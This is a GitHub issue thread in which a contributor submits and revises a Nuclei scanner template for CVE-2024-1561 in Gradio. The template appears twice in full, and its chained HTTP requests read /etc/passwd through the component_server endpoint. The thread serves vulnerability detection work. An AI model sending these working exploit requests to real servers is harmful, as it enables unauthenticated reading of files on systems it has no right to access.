-
Notifications
You must be signed in to change notification settings - Fork 2.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[nuclei-template] CVE-2024-1561 #9771
Comments
Check here for usage and output https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561/tree/main |
@DhiyaneshGeek I have an improvement to this for the regex part before this gets added :
id: CVE-2024-1561
info:
name: CVE-2024-1561
author: Diablo
description: |
Local file read by calling arbitrary methods of Components class
severity: HIGH
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
metadata:
max-request: 1
vendor: Gradio
product: https://github.com/gradio-app/gradio
tags: cve,cve2024,intrusive,unauth,gradio,path-traversal
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
|
Hi @DiabloHTB this below part only updated right ?
|
@DhiyaneshGeek Hey there, that part and the last request changed from id: CVE-2024-1561
info:
name: CVE-2024-1561
author: Diablo
description: |
Local file read by calling arbitrary methods of Components class
severity: HIGH
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
metadata:
max-request: 1
vendor: Gradio
product: https://github.com/gradio-app/gradio
tags: cve,cve2024,intrusive,unauth,gradio,path-traversal
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
# digest: 490a0046304402203c6137fea5301e4c6d68e46f20ce0a6c5a88919d747eecf8b4f4df9773d84845022031b061bfbc332f22390d9ea69831e2f94586cc49fd8a1b1419dd39c2a8dda8d1:9c69f0f6a1e1d9ed8dd8d3f14441892c
|
Hi @DiabloHTB i'll update the PR #9800 from my side You can grab your cool PD stickers over here http://nux.gg/stickers 😄 Thanks for sharing the updated template |
Template Information:
Local file read by calling arbitrary methods of Components class in Gradio 4.12.0, the template I created detects this by trying to get the
/etc/passwd
and matching with the wordroot
using three requests :/config
and extracting the id of the first component/component_server
and using the previously extracted id to get the temporary path of the/etc/passwd
, the response is in double quotes, using regex to extract the hash inside it and using in the next request-------NOTE------
This step can be improved by extracting the whole path without double quotes using regex, I couldn't find a way to do this.
tmpath
to get the/etc/passwd
using the already extracted hash, example "/tmp/gradio/{{tmpath}}passwd" and match with the word "root:[x*]:0:0:"Gradio https://github.com/gradio-app/gradio
Full writeup and Python script to exploit: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
Sh PoC was created by me:https://github.com/DiabloHTB/CVE-2024-1561
Nuclei Template:
Example output :
The text was updated successfully, but these errors were encountered: